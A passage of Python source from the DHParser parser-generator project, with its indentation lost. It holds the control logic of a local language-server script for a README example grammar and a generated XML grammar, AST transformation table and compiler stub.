global KNOWN_HOST, KNOWN_PORT
global scriptpath, servername
from multiprocessing import set_start_method
# 'forkserver' or 'spawn' required to avoid broken process pools
if sys.platform.lower().startswith('linux') : set_start_method('forkserver')
else: set_start_method('spawn')
grammar_src = os.path.abspath(__file__).replace('Server.py', '.ebnf')
dhparserdir = os.path.abspath(os.path.join(scriptpath, '../..'))
if scriptpath not in sys.path:
sys.path.append(scriptpath)
if dhparserdir not in sys.path:
sys.path.append(dhparserdir)
# from tst_readme_example_grammar import recompile_grammar
# recompile_grammar(os.path.join(scriptpath, 'readme_example.ebnf'), force=False)
from DHParser.dsl import recompile_grammar
if not recompile_grammar(grammar_src, force=False,
notify=lambda: print('recompiling ' + grammar_src)):
print('\nErrors while recompiling "%s":' % grammar_src +
'\n--------------------------------------\n\n')
with open('readme_example_ebnf_ERRORS.txt', encoding='utf-8') as f:
print(f.read())
sys.exit(1)
from readme_exampleParser import compile_src
from DHParser.server import Server, probe_tcp_server, StreamReaderProxy, StreamWriterProxy
from DHParser.lsp import gen_lsp_table
readme_example_lsp = readme_exampleLanguageServerProtocol()
lsp_table = readme_example_lsp.lsp_fulltable.copy()
lsp_table.setdefault('default', compile_src)
readme_example_server = Server(rpc_functions=lsp_table,
cpu_bound=readme_example_lsp.cpu_bound.lsp_table.keys(),
blocking=readme_example_lsp.blocking.lsp_table.keys(),
connection_callback=readme_example_lsp.connect,
server_name="readme_exampleServer",
strict_lsp=True)
if log_path is not None:
# echoing does not work with stream connections!
readme_example_server.echo_log = True if port >= 0 and host else False
msg = readme_example_server.start_logging(log_path.strip('" \''))
if readme_example_server.echo_log: echo(msg)
if port < 0 or not host:
# communication via streams instead of tcp server
reader = StreamReaderProxy(sys.stdin)
writer = StreamWriterProxy(sys.stdout)
readme_example_server.run_stream_server(reader, writer)
return
cfg_filename = get_config_filename()
overwrite = not os.path.exists(cfg_filename)
ports = ALTERNATIVE_PORTS.copy() if port == DEFAULT_PORT else []
if port in ports:
ports.remove(port)
ports.append(port)
while ports:
port = ports.pop()
if (host, port) == (KNOWN_HOST, KNOWN_PORT):
ident = asyncio_run(probe_tcp_server(host, port, SERVER_REPLY_TIMEOUT))
if ident:
if ident.endswith(servername):
echo('A server of type "%s" already exists on %s:%i.' % (servername, host, port)
+ ' Use --port option to start a secondary server on a different port.')
sys.exit(1)
if ports:
echo('"%s" already occupies %s:%i. Trying port %i' % (ident, host, port, ports[-1]))
continue
else:
echo('"%s" already occupies %s:%i. No more ports to try.' % (ident, host, port))
sys.exit(1)
if overwrite:
try:
with open(cfg_filename, 'w') as f:
debug('Storing host and port value %s:%i in file "%s".'
% (host, port, cfg_filename))
f.write(host + ' ' + str(port))
except (PermissionError, IOError) as e:
echo('%s: Could not write temporary config file: "%s"' % (str(e), cfg_filename))
ports = []
else:
echo('Configuration file "%s" already existed and was not overwritten. '
'Use option "--port %i" to stop this server!' % (cfg_filename, port))
try:
debug('Starting server on %s:%i' % (host, port))
readme_example_server.run_tcp_server(host, port) # returns only after server has stopped!
ports = []
except OSError as e:
if not (ports and e.errno == 98):
echo(e)
echo('Could not start server. Shutting down!')
sys.exit(1)
elif ports:
echo('Could not start server on %s:%i. Trying port %s' % (host, port, ports[-1]))
else:
echo('Could not start server on %s:%i. No more ports to try.' % (host, port))
finally:
if not ports:
echo('Server on %s:%i stopped' % (host, port))
if overwrite:
try:
os.remove(cfg_filename)
debug('removing temporary config file: ' + cfg_filename)
except FileNotFoundError:
pass
async def send_request(reader, writer, request, timeout=SERVER_REPLY_TIMEOUT) -> str:
"""Sends a request and returns the decoded response."""
writer.write(request.encode() if isinstance(request, str) else request)
try:
data = await asyncio.wait_for(reader.read(DATA_RECEIVE_LIMIT), timeout)
except asyncio.TimeoutError as e:
echo('Server did not answer to "%s"-Request within %i seconds.'
% (request, timeout))
raise e
return data.decode()
async def close_connection(writer):
"""Closes the communication-channel."""
writer.close()
if sys.version_info >= (3, 7):
await writer.wait_closed()
async def final_request(reader, writer, request, timeout=SERVER_REPLY_TIMEOUT) -> str:
"""Sends a (last) request and then closes the communication channel.
Returns the decoded response to the request."""
try:
data = await send_request(reader, writer, request, timeout)
finally:
await close_connection(writer)
return data
async def single_request(request, host, port, timeout=SERVER_REPLY_TIMEOUT) -> str:
"""Opens a connection, sends a single request, and closes the connection
again before returning the decoded result."""
try:
reader, writer = await asyncio.open_connection(host, port)
except ConnectionRefusedError:
echo('No server running on: ' + host + ':' + str(port))
sys.exit(1)
try:
result = await final_request(reader, writer, request, timeout)
except asyncio.TimeoutError:
sys.exit(1)
return result
async def connect_to_daemon(host, port) -> tuple:
"""Opens a connections to the server on host, port. Returns the reader,
writer and the string result of the identification-request."""
global KNOWN_HOST, KNOWN_PORT, servername
delay = 0.05
countdown = SERVER_REPLY_TIMEOUT / delay + 10
ident, reader, writer = None, None, None
cfg_filename = get_config_filename()
save = (host, port)
while countdown > 0:
try:
if (host, port) != (KNOWN_HOST, KNOWN_PORT):
raise ValueError # don't connect if host and port are not either
# read from config-file or specified explicitly on the command line
reader, writer = await asyncio.open_connection(host, port)
try:
ident = await send_request(reader, writer, IDENTIFY_REQUEST)
if not ident.endswith(servername):
ident = None
raise ValueError
countdown = 0
except (asyncio.TimeoutError, ValueError):
echo('Server "%s" not found on %s:%i' % (servername, host, port))
await close_connection(writer)
reader, writer = None, None
await asyncio.sleep(delay)
countdown -= 1
h, p = retrieve_host_and_port()
if (h, p) != (host, port):
# try again with a different host and port
host, port = h, p
except (ConnectionRefusedError, ValueError):
await asyncio.sleep(delay)
if os.path.exists(cfg_filename):
host, port = retrieve_host_and_port()
countdown -= 1
if ident is not None and save != (host, port):
echo('Server "%s" found on different port %i' % (servername, port))
return reader, writer, ident
async def start_server_daemon(host, port, requests) -> list:
"""Starts a server in the background and opens a connections. Sends requests if
given and returns a list of their results."""
import subprocess
ident, reader, writer = None, None, None
if os.path.exists(get_config_filename()):
reader, writer, ident = await connect_to_daemon(host, port)
if ident is not None:
if not requests:
echo('Server "%s" already running on %s:%i' % (ident, host, port))
else:
try:
subprocess.Popen([__file__, '--startserver', host, str(port)])
except OSError:
subprocess.Popen([sys.executable, __file__, '--startserver', host, str(port)])
reader, writer, ident = await connect_to_daemon(host, port)
if ident is None:
echo('Could not start server or establish connection in time :-(')
sys.exit(1)
if not requests:
echo('Server "%s" started.' % ident)
results = []
for request in requests:
assert request
results.append(await send_request(reader, writer, request))
await close_connection(writer)
return results
def parse_logging_args(args):
if args.logging or args.logging is None:
global host, port
if port >= 0 and host:
echo = repr('ECHO_ON') if isinstance(args.startserver, list) else repr('ECHO_OFF')
else: # echoing does not work with stream connections!
echo = repr('ECHO_OFF')
if args.logging in ('OFF', 'STOP', 'NO', 'FALSE'):
log_path = repr(None)
echo = repr('ECHO_OFF')
elif args.logging in ('ON', 'START', 'YES', 'TRUE'):
log_path = repr(LOG_PATH)
else:
log_path = repr(LOG_PATH) if args.logging is None else repr(args.logging)
request = LOGGING_REQUEST.replace('""', ", ".join((log_path, echo)))
debug('Logging to %s with call %s' % (log_path, request))
return log_path, request
else:
return None, ''
if __name__ == "__main__":
from argparse import ArgumentParser
parser = ArgumentParser(description="Setup and Control of a Server for processing readme_example-files.")
action_group = parser.add_mutually_exclusive_group()
action_group.add_argument('file', nargs='?')
action_group.add_argument('-t', '--status', action='store_true',
help="displays the server's status, e.g. whether it is running")
action_group.add_argument('-s', '--startserver', nargs='*', metavar=("HOST", "PORT"),
help="starts the server")
action_group.add_argument('-d', '--startdaemon', action='store_true',
help="starts the server in the background")
action_group.add_argument('-k', '--stopserver', action='store_true',
help="starts the server")
action_group.add_argument('-r', '--stream', action='store_true', help="start stream server")
parser.add_argument('-o', '--host', nargs=1, default=[''],
help='host name or IP-address of the server (default: 127.0.0.1)')
parser.add_argument('-p', '--port', nargs=1, type=int, default=[-1],
help='port number of the server (default:8888)')
parser.add_argument('-l', '--logging', nargs='?', metavar="ON|LOG_DIR|OFF", default='',
help='turns logging on (default) or off or writes log to a '
'specific directory (implies on)')
parser.add_argument('-b', '--debug', action='store_true', help="debug messages")
args = parser.parse_args()
if args.debug:
DEBUG = True
host = args.host[0]
port = int(args.port[0])
if args.stream:
CONNECTION_TYPE = 'streams'
if port >= 0 or host:
echo('Specifying host and port when using streams as transport does not make sense')
sys.exit(1)
log_path, _ = parse_logging_args(args)
run_server('', -1, log_path)
sys.exit(0)
if port < 0 or not host:
# if host and port have not been specified explicitly on the command
# line, try to retrieve them from (temporary) config file or use
# hard coded default values
h, p = retrieve_host_and_port()
debug('Retrieved host and port value %s:%i from config file.' % (h, p))
if port < 0:
port = p
else:
KNOWN_PORT = port # we assume, the user knows what (s)he is doing...
if not host:
host = h
else:
KNOWN_HOST = host # ...when explicitly requesting a particular host, port
if args.status:
result = asyncio_run(single_request(IDENTIFY_REQUEST, host, port, SERVER_REPLY_TIMEOUT))
echo('Server ' + str(result) + ' running on ' + host + ':' + str(port))
elif args.startserver is not None:
portstr = None
if len(args.startserver) == 1:
host, portstr = args.startserver[0].split(':')
elif len(args.startserver) == 2:
host, portstr = args.startserver
elif len(args.startserver) != 0:
parser.error('Wrong number of arguments for "--startserver"!')
if portstr is not None:
try:
port = int(portstr)
except ValueError:
parser.error('port must be a number!')
log_path, _ = parse_logging_args(args)
sys.exit(run_server(host, port, log_path))
elif args.startdaemon:
log_path, log_request = parse_logging_args(args)
        asyncio_run(start_server_daemon(host, port, [log_request] if log_request else []))
elif args.stopserver:
try:
result = asyncio_run(single_request(STOP_SERVER_REQUEST_BYTES, host, port))
except ConnectionRefusedError as e:
echo(e)
sys.exit(1)
debug(result)
elif args.logging:
log_path, request = parse_logging_args(args)
debug(asyncio_run(single_request(request, host, port)))
elif args.file:
file_name = args.file
if not file_name.endswith(')'):
# argv does not seem to be a command (e.g. "identify()") but a file name or path
file_name = os.path.abspath(file_name)
log_path, log_request = parse_logging_args(args)
requests = [log_request, file_name] if log_request else [file_name]
result = asyncio_run(start_server_daemon(host, port, requests))[-1]
if len(result) >= DATA_RECEIVE_LIMIT:
            echo(result + '...')
else:
echo(result)
else:
echo('Usages:\n'
+ ' python readme_exampleServer.py --startserver [--host host] [--port port] [--logging [ON|LOG_PATH|OFF]]\n'
+ ' python readme_exampleServer.py --startdaemon [--host host] [--port port] [--logging [ON|LOG_PATH|OFF]]\n'
+ ' python readme_exampleServer.py --stream\n'
+ ' python readme_exampleServer.py --stopserver\n'
+ ' python readme_exampleServer.py --status\n'
+ ' python readme_exampleServer.py --logging [ON|LOG_PATH|OFF]\n'
+ ' python readme_exampleServer.py FILENAME.dsl [--host host] [--port port] [--logging [ON|LOG_PATH|OFF]]')
sys.exit(1)
```
#### File: examples/XML/XMLParser.py
```python
import collections
from functools import partial
import os
import sys
try:
scriptpath = os.path.dirname(__file__)
except NameError:
scriptpath = ''
dhparser_parentdir = os.path.abspath(os.path.join(scriptpath, r'../..'))
if scriptpath not in sys.path:
sys.path.append(scriptpath)
if dhparser_parentdir not in sys.path:
sys.path.append(dhparser_parentdir)
try:
import regex as re
except ImportError:
import re
from DHParser import start_logging, suspend_logging, resume_logging, is_filename, load_if_file, \
Grammar, Compiler, nil_preprocessor, PreprocessorToken, Whitespace, Drop, AnyChar, \
Lookbehind, Lookahead, Alternative, Pop, Text, Synonym, Counted, Interleave, INFINITE, \
Option, NegativeLookbehind, OneOrMore, RegExp, Retrieve, Series, Capture, \
ZeroOrMore, Forward, NegativeLookahead, Required, mixin_comment, compile_source, \
grammar_changed, last_value, matching_bracket, PreprocessorFunc, is_empty, remove_if, \
Node, TransformerCallable, TransformationDict, transformation_factory, traverse, \
remove_children_if, move_adjacent, normalize_whitespace, is_anonymous, matches_re, \
reduce_single_child, replace_by_single_child, replace_or_reduce, remove_whitespace, \
replace_by_children, remove_empty, remove_tokens, flatten, PLACEHOLDER, \
merge_adjacent, collapse, collapse_children_if, transform_content, WHITESPACE_PTYPE, \
TOKEN_PTYPE, remove_children, remove_content, remove_brackets, change_tag_name, \
remove_anonymous_tokens, keep_children, is_one_of, not_one_of, has_content, apply_if, peek, \
remove_anonymous_empty, keep_nodes, traverse_locally, strip, lstrip, rstrip, \
transform_content, replace_content_with, forbid, assert_content, remove_infix_operator, \
add_error, error_on, recompile_grammar, left_associative, lean_left, set_config_value, \
get_config_value, node_maker, any_of, access_thread_locals, access_presets, \
finalize_presets, ErrorCode, RX_NEVER_MATCH, set_tracer, resume_notices_on, \
trace_history, has_descendant, neg, has_ancestor, optional_last_value, insert, \
positions_of, replace_tag_names, add_attributes, delimit_children, merge_connected, \
has_attr, has_parent, ThreadLocalSingletonFactory
#######################################################################
#
# PREPROCESSOR SECTION - Can be edited. Changes will be preserved.
#
#######################################################################
def XMLPreprocessor(text, source_name):
return None, text, lambda i: i, []
def get_preprocessor() -> PreprocessorFunc:
return XMLPreprocessor
#######################################################################
#
# PARSER SECTION - Don't edit! CHANGES WILL BE OVERWRITTEN!
#
#######################################################################
class XMLGrammar(Grammar):
r"""Parser for a XML source file.
"""
choice = Forward()
cp = Forward()
element = Forward()
extSubsetDecl = Forward()
ignoreSectContents = Forward()
source_hash__ = "6bca80310e6c9b0436e6568981b9b334"
disposable__ = re.compile('..(?<=^)')
static_analysis_pending__ = [] # type: List[bool]
parser_initialization__ = ["upon instantiation"]
COMMENT__ = r''
comment_rx__ = RX_NEVER_MATCH
WHITESPACE__ = r'\s*'
WSP_RE__ = mixin_comment(whitespace=WHITESPACE__, comment=COMMENT__)
wsp__ = Whitespace(WSP_RE__)
dwsp__ = Drop(Whitespace(WSP_RE__))
EOF = NegativeLookahead(RegExp('.'))
S = RegExp('\\s+')
Char = RegExp('\\x09|\\x0A|\\x0D|[\\u0020-\\uD7FF]|[\\uE000-\\uFFFD]|[\\U00010000-\\U0010FFFF]')
Chars = RegExp('(?:\\x09|\\x0A|\\x0D|[\\u0020-\\uD7FF]|[\\uE000-\\uFFFD]|[\\U00010000-\\U0010FFFF])+')
CharRef = Alternative(Series(Drop(Text('&#')), RegExp('[0-9]+'), Drop(Text(';'))), Series(Drop(Text('&#x')), RegExp('[0-9a-fA-F]+'), Drop(Text(';'))))
CommentChars = RegExp('(?:(?!-)(?:\\x09|\\x0A|\\x0D|[\\u0020-\\uD7FF]|[\\uE000-\\uFFFD]|[\\U00010000-\\U0010FFFF]))+')
PIChars = RegExp('(?:(?!\\?>)(?:\\x09|\\x0A|\\x0D|[\\u0020-\\uD7FF]|[\\uE000-\\uFFFD]|[\\U00010000-\\U0010FFFF]))+')
IgnoreChars = RegExp('(?:(?!(?:<!\\[)|(?:\\]\\]>))(?:\\x09|\\x0A|\\x0D|[\\u0020-\\uD7FF]|[\\uE000-\\uFFFD]|[\\U00010000-\\U0010FFFF]))+')
CData = RegExp('(?:(?!\\]\\]>)(?:\\x09|\\x0A|\\x0D|[\\u0020-\\uD7FF]|[\\uE000-\\uFFFD]|[\\U00010000-\\U0010FFFF]))+')
CharData = RegExp('(?:(?!\\]\\]>)[^<&])+')
PubidChars = RegExp("(?:\\x20|\\x0D|\\x0A|[a-zA-Z0-9]|[-'()+,./:=?;!*#@$_%])+")
PubidCharsSingleQuoted = RegExp('(?:\\x20|\\x0D|\\x0A|[a-zA-Z0-9]|[-()+,./:=?;!*#@$_%])+')
CDSect = Series(Drop(Text('<![CDATA[')), CData, Drop(Text(']]>')))
NameStartChar = RegExp('(?x)_|:|[A-Z]|[a-z]\n |[\\u00C0-\\u00D6]|[\\u00D8-\\u00F6]|[\\u00F8-\\u02FF]\n |[\\u0370-\\u037D]|[\\u037F-\\u1FFF]|[\\u200C-\\u200D]\n |[\\u2070-\\u218F]|[\\u2C00-\\u2FEF]|[\\u3001-\\uD7FF]\n |[\\uF900-\\uFDCF]|[\\uFDF0-\\uFFFD]\n |[\\U00010000-\\U000EFFFF]')
NameChars = RegExp('(?x)(?:_|:|-|\\.|[A-Z]|[a-z]|[0-9]\n |\\u00B7|[\\u0300-\\u036F]|[\\u203F-\\u2040]\n |[\\u00C0-\\u00D6]|[\\u00D8-\\u00F6]|[\\u00F8-\\u02FF]\n |[\\u0370-\\u037D]|[\\u037F-\\u1FFF]|[\\u200C-\\u200D]\n |[\\u2070-\\u218F]|[\\u2C00-\\u2FEF]|[\\u3001-\\uD7FF]\n |[\\uF900-\\uFDCF]|[\\uFDF0-\\uFFFD]\n |[\\U00010000-\\U000EFFFF])+')
Comment = Series(Drop(Text('<!--')), ZeroOrMore(Alternative(CommentChars, RegExp('-(?!-)'))), Drop(Text('-->')))
Name = Series(NameStartChar, Option(NameChars))
PITarget = Series(NegativeLookahead(RegExp('X|xM|mL|l')), Name)
PI = Series(Drop(Text('<?')), PITarget, Option(Series(dwsp__, PIChars)), Drop(Text('?>')))
Misc = OneOrMore(Alternative(Comment, PI, S))
Names = Series(Name, ZeroOrMore(Series(RegExp(' '), Name)))
Nmtoken = Synonym(NameChars)
Nmtokens = Series(Nmtoken, ZeroOrMore(Series(RegExp(' '), Nmtoken)))
PEReference = Series(Drop(Text('%')), Name, Drop(Text(';')))
EntityRef = Series(Drop(Text('&')), Name, Drop(Text(';')))
Reference = Alternative(EntityRef, CharRef)
PubidLiteral = Alternative(Series(Drop(Text('"')), Option(PubidChars), Drop(Text('"'))), Series(Drop(Text("\'")), Option(PubidCharsSingleQuoted), Drop(Text("\'"))))
SystemLiteral = Alternative(Series(Drop(Text('"')), RegExp('[^"]*'), Drop(Text('"'))), Series(Drop(Text("\'")), RegExp("[^']*"), Drop(Text("\'"))))
AttValue = Alternative(Series(Drop(Text('"')), ZeroOrMore(Alternative(RegExp('[^<&"]+'), Reference)), Drop(Text('"'))), Series(Drop(Text("\'")), ZeroOrMore(Alternative(RegExp("[^<&']+"), Reference)), Drop(Text("\'"))))
EntityValue = Alternative(Series(Drop(Text('"')), ZeroOrMore(Alternative(RegExp('[^%&"]+'), PEReference, Reference)), Drop(Text('"'))), Series(Drop(Text("\'")), ZeroOrMore(Alternative(RegExp("[^%&']+"), PEReference, Reference)), Drop(Text("\'"))))
content = Series(Option(CharData), ZeroOrMore(Series(Alternative(element, Reference, CDSect, PI, Comment), Option(CharData))))
Attribute = Series(Name, dwsp__, Drop(Text('=')), dwsp__, AttValue, mandatory=2)
TagName = Capture(Synonym(Name))
emptyElement = Series(Drop(Text('<')), Name, ZeroOrMore(Series(dwsp__, Attribute)), dwsp__, Drop(Text('/>')))
ETag = Series(Drop(Text('</')), Pop(TagName), dwsp__, Drop(Text('>')), mandatory=1)
STag = Series(Drop(Text('<')), TagName, ZeroOrMore(Series(dwsp__, Attribute)), dwsp__, Drop(Text('>')))
EncName = RegExp('[A-Za-z][A-Za-z0-9._\\-]*')
NDataDecl = Series(Drop(Text('NData')), S, Name, mandatory=1)
PublicID = Series(Drop(Text('PUBLIC')), S, PubidLiteral, mandatory=1)
ExternalID = Alternative(Series(Drop(Text('SYSTEM')), S, SystemLiteral, mandatory=1), Series(Drop(Text('PUBLIC')), S, PubidLiteral, S, SystemLiteral, mandatory=1))
NotationDecl = Series(Drop(Text('<!NOTATION')), S, Name, dwsp__, Alternative(ExternalID, PublicID), dwsp__, Drop(Text('>')), mandatory=1)
PEDef = Alternative(EntityValue, ExternalID)
EntityDef = Alternative(EntityValue, Series(ExternalID, Option(NDataDecl)))
PEDecl = Series(Drop(Text('<!ENTITY')), S, Drop(Text('%')), S, Name, S, PEDef, dwsp__, Drop(Text('>')), mandatory=3)
GEDecl = Series(Drop(Text('<!ENTITY')), S, Name, S, EntityDef, dwsp__, Drop(Text('>')), mandatory=3)
EntityDecl = Alternative(GEDecl, PEDecl)
FIXED = Series(Option(Series(Drop(Text('#FIXED')), S)), AttValue)
IMPLIED = Text('#IMPLIED')
REQUIRED = Text('#REQUIRED')
DefaultDecl = Alternative(REQUIRED, IMPLIED, FIXED)
Enumeration = Series(Drop(Text('(')), dwsp__, Nmtoken, ZeroOrMore(Series(dwsp__, Drop(Text('|')), dwsp__, Nmtoken)), dwsp__, Drop(Text(')')))
NotationType = Series(Drop(Text('NOTATION')), S, Drop(Text('(')), dwsp__, Name, ZeroOrMore(Series(dwsp__, Drop(Text('|')), dwsp__, Name)), dwsp__, Drop(Text(')')))
EnumeratedType = Alternative(NotationType, Enumeration)
NMTOKENS = Text('NMTOKENS')
NMTOKEN = Text('NMTOKEN')
ENTITIES = Text('ENTITIES')
ENTITY = Text('ENTITY')
IDREFS = Text('IDREFS')
IDREF = Text('IDREF')
ID = Text('ID')
TokenizedType = Alternative(IDREFS, IDREF, ID, ENTITY, ENTITIES, NMTOKENS, NMTOKEN)
StringType = Text('CDATA')
AttType = Alternative(StringType, TokenizedType, EnumeratedType)
AttDef = Series(Name, dwsp__, AttType, S, DefaultDecl, mandatory=2)
AttlistDecl = Series(Drop(Text('<!ATTLIST')), S, Name, ZeroOrMore(Series(dwsp__, AttDef)), dwsp__, Drop(Text('>')), mandatory=1)
seq = Series(Drop(Text('(')), dwsp__, cp, ZeroOrMore(Series(dwsp__, Drop(Text(',')), dwsp__, cp)), dwsp__, Drop(Text(')')))
VersionNum = RegExp('[0-9]+\\.[0-9]+')
VersionInfo = Series(dwsp__, Drop(Text('version')), dwsp__, Drop(Text('=')), dwsp__, Alternative(Series(Drop(Text("\'")), VersionNum, Drop(Text("\'"))), Series(Drop(Text('"')), VersionNum, Drop(Text('"')))))
children = Series(Alternative(choice, seq), Option(Alternative(Drop(Text('?')), Drop(Text('*')), Drop(Text('+')))))
Mixed = Alternative(Series(Drop(Text('(')), dwsp__, Drop(Text('#PCDATA')), ZeroOrMore(Series(dwsp__, Drop(Text('|')), dwsp__, Name)), dwsp__, Drop(Text(')*'))), Series(Drop(Text('(')), dwsp__, Drop(Text('#PCDATA')), dwsp__, Drop(Text(')'))))
ANY = Text('ANY')
EMPTY = Text('EMPTY')
contentspec = Alternative(EMPTY, ANY, Mixed, children)
elementdecl = Series(Drop(Text('<!ELEMENT')), S, Name, dwsp__, contentspec, dwsp__, Drop(Text('>')), mandatory=1)
EncodingDecl = Series(dwsp__, Drop(Text('encoding')), dwsp__, Drop(Text('=')), dwsp__, Alternative(Series(Drop(Text("\'")), EncName, Drop(Text("\'"))), Series(Drop(Text('"')), EncName, Drop(Text('"')))))
TextDecl = Series(Drop(Text('<?xml')), Option(VersionInfo), EncodingDecl, dwsp__, Drop(Text('?>')))
extParsedEnt = Series(Option(TextDecl), content)
ignoreSect = Series(Drop(Text('<![')), dwsp__, Drop(Text('IGNORE')), dwsp__, Drop(Text('[')), ignoreSectContents, Drop(Text(']]>')))
includeSect = Series(Drop(Text('<![')), dwsp__, Drop(Text('INCLUDE')), dwsp__, Drop(Text('[')), extSubsetDecl, Drop(Text(']]>')))
conditionalSect = Alternative(includeSect, ignoreSect)
Yes = Text('yes')
extSubset = Series(Option(TextDecl), extSubsetDecl)
markupdecl = Alternative(elementdecl, AttlistDecl, EntityDecl, NotationDecl, PI, Comment)
DeclSep = Alternative(PEReference, S)
intSubset = ZeroOrMore(Alternative(markupdecl, DeclSep))
doctypedecl = Series(Drop(Text('<!DOCTYPE')), dwsp__, Name, Option(Series(dwsp__, ExternalID)), dwsp__, Option(Series(Drop(Text('[')), intSubset, Drop(Text(']')), dwsp__)), Drop(Text('>')), mandatory=2)
No = Text('no')
SDDecl = Series(dwsp__, Drop(Text('standalone')), dwsp__, Drop(Text('=')), dwsp__, Alternative(Alternative(Series(Drop(Text("\'")), Yes), Series(No, Drop(Text("\'")))), Alternative(Series(Drop(Text('"')), Yes), Series(No, Drop(Text('"'))))))
XMLDecl = Series(Drop(Text('<?xml')), VersionInfo, Option(EncodingDecl), Option(SDDecl), dwsp__, Drop(Text('?>')))
prolog = Series(Option(Series(dwsp__, XMLDecl)), Option(Misc), Option(Series(doctypedecl, Option(Misc))))
element.set(Alternative(emptyElement, Series(STag, content, ETag, mandatory=1)))
cp.set(Series(Alternative(Name, choice, seq), Option(Alternative(Drop(Text('?')), Drop(Text('*')), Drop(Text('+'))))))
choice.set(Series(Drop(Text('(')), dwsp__, OneOrMore(Series(dwsp__, Drop(Text('|')), dwsp__, cp)), dwsp__, Drop(Text(')'))))
ignoreSectContents.set(Series(IgnoreChars, ZeroOrMore(Series(Drop(Text('<![')), ignoreSectContents, Drop(Text(']]>')), IgnoreChars))))
extSubsetDecl.set(ZeroOrMore(Alternative(markupdecl, conditionalSect, DeclSep)))
document = Series(prolog, element, Option(Misc), EOF)
root__ = document
_raw_grammar = ThreadLocalSingletonFactory(XMLGrammar, ident=1)
def get_grammar() -> XMLGrammar:
grammar = _raw_grammar()
if get_config_value('resume_notices'):
resume_notices_on(grammar)
elif get_config_value('history_tracking'):
set_tracer(grammar, trace_history)
try:
if not grammar.__class__.python_src__:
grammar.__class__.python_src__ = get_grammar.python_src__
except AttributeError:
pass
return grammar
def parse_XML(document, start_parser = "root_parser__", *, complete_match=True):
return get_grammar()(document, start_parser, complete_match)
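# Usage sketch (illustrative, not part of the generated code): parse a small,
# self-contained XML string with the thread-local grammar. The sample string
# below is an assumption made up for this example.
#
#     syntax_tree = parse_XML('<greeting lang="en">Hello</greeting>')
#     print(syntax_tree.as_sxpr())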
#######################################################################
#
# AST SECTION - Can be edited. Changes will be preserved.
#
#######################################################################
XML_AST_transformation_table = {
# AST Transformations for the XML-grammar
"<": [flatten, remove_empty, remove_anonymous_tokens, remove_whitespace, remove_children("S")],
"document": [flatten(lambda context: context[-1].tag_name == 'prolog', recursive=False)],
"prolog": [],
"XMLDecl": [],
"VersionInfo": [reduce_single_child],
"VersionNum": [],
"EncodingDecl": [reduce_single_child],
"EncName": [],
"SDDecl": [],
"Yes": [],
"No": [],
"doctypedecl": [],
"intSubset": [],
"DeclSep": [replace_or_reduce],
"markupdecl": [replace_or_reduce],
"extSubset": [],
"extSubsetDecl": [],
"conditionalSect": [replace_or_reduce],
"includeSect": [],
"ignoreSect": [],
"ignoreSectContents": [],
"extParsedEnt": [],
"TextDecl": [],
"elementdecl": [],
"contentspec": [replace_or_reduce],
"EMPTY": [],
"ANY": [],
"Mixed": [replace_or_reduce],
"children": [],
"choice": [],
"cp": [],
"seq": [],
"AttlistDecl": [],
"AttDef": [],
"AttType": [replace_or_reduce],
"StringType": [],
"TokenizedType": [replace_or_reduce],
"ID": [],
"IDREF": [],
"IDREFS": [],
"ENTITY": [],
"ENTITIES": [],
"NMTOKEN": [],
"NMTOKENS": [],
"EnumeratedType": [replace_or_reduce],
"NotationType": [],
"Enumeration": [],
"DefaultDecl": [replace_or_reduce],
"REQUIRED": [],
"IMPLIED": [],
"FIXED": [],
"EntityDecl": [replace_or_reduce],
"GEDecl": [],
"PEDecl": [],
"EntityDef": [replace_or_reduce],
"PEDef": [replace_or_reduce],
"NotationDecl": [],
"ExternalID": [],
"PublicID": [],
"NDataDecl": [],
"element": [flatten, replace_by_single_child],
"STag": [],
"ETag": [reduce_single_child],
"emptyElement": [],
"TagName": [replace_by_single_child],
"Attribute": [],
"content": [flatten],
"EntityValue": [replace_or_reduce],
"AttValue": [replace_or_reduce],
"SystemLiteral": [replace_or_reduce],
"PubidLiteral": [replace_or_reduce],
"Reference": [replace_or_reduce],
"EntityRef": [],
"PEReference": [],
"Nmtokens": [],
"Nmtoken": [reduce_single_child],
"Names": [],
"Name": [collapse],
"NameStartChar": [],
"NameChars": [],
"Misc": [],
"Comment": [collapse],
"PI": [],
"PITarget": [reduce_single_child],
"CDSect": [],
"PubidCharsSingleQuoted": [],
"PubidChars": [],
"CharData": [],
"CData": [],
"IgnoreChars": [],
"PIChars": [],
"CommentChars": [],
"CharRef": [replace_or_reduce],
"Chars": [],
"Char": [],
"S": [],
"EOF": [],
"*": replace_by_single_child
}
def CreateXMLTransformer() -> TransformerCallable:
"""Creates a transformation function that does not share state with other
threads or processes."""
return partial(traverse, processing_table=XML_AST_transformation_table.copy())
def get_transformer() -> TransformerCallable:
"""Returns a thread/process-exclusive transformation function."""
THREAD_LOCALS = access_thread_locals()
try:
transformer = THREAD_LOCALS.XML_00000001_transformer_singleton
except AttributeError:
THREAD_LOCALS.XML_00000001_transformer_singleton = CreateXMLTransformer()
transformer = THREAD_LOCALS.XML_00000001_transformer_singleton
return transformer
#######################################################################
#
# COMPILER SECTION - Can be edited. Changes will be preserved.
#
#######################################################################
# def internalize(context):
# """Sets the node's parser type to the tag name and internalizes
# XML attr."""
# node = context[-1]
# if node.parser.name == 'element':
# node.parser = MockParser(node['STag']['Name'].content, ':element')
# node.result = node.result[1:-1]
# elif node.parser.name == 'emptyElement':
# node.parser = MockParser(node['Name'].content, ':emptyElement')
# node.result = node.result[1:]
# else:
# assert node.parser.ptype in [':element', ':emptyElement'], \
# "Tried to internalize tag name and attr for non element component!"
# return
# for nd in node.result:
# if nd.parser.name == 'Attribute':
# node.attr[nd['Name'].content] = nd['AttValue'].content
# remove_children(context, {'Attribute'})
class XMLCompiler(Compiler):
"""Compiler for the abstract-syntax-tree of a XML source file.
"""
def __init__(self):
super(XMLCompiler, self).__init__()
self.cleanup_whitespace = True # remove empty CharData from mixed elements
def reset(self):
super().reset()
self.mock_parsers = dict()
def extract_attributes(self, node_sequence):
attributes = collections.OrderedDict()
for node in node_sequence:
if node.tag_name == "Attribute":
                assert node[0].tag_name == "Name", node.as_sxpr()
assert node[1].tag_name == "AttValue", node.as_sxpr()
attributes[node[0].content] = node[1].content
return attributes
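    # Behavior sketch (hedged): for a start-tag such as <unit id="u1" lang="en">,
    # the node sequence of the STag contains two "Attribute" children, and
    # extract_attributes returns OrderedDict([('id', 'u1'), ('lang', 'en')]).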
def get_parser(self, tag_name):
"""Returns a mock parser with the given tag_name as parser name."""
return self.mock_parsers.setdefault(tag_name, MockParser(tag_name))
def validity_constraint(self, node, condition, err_msg):
"""If `condition` is False an error is issued."""
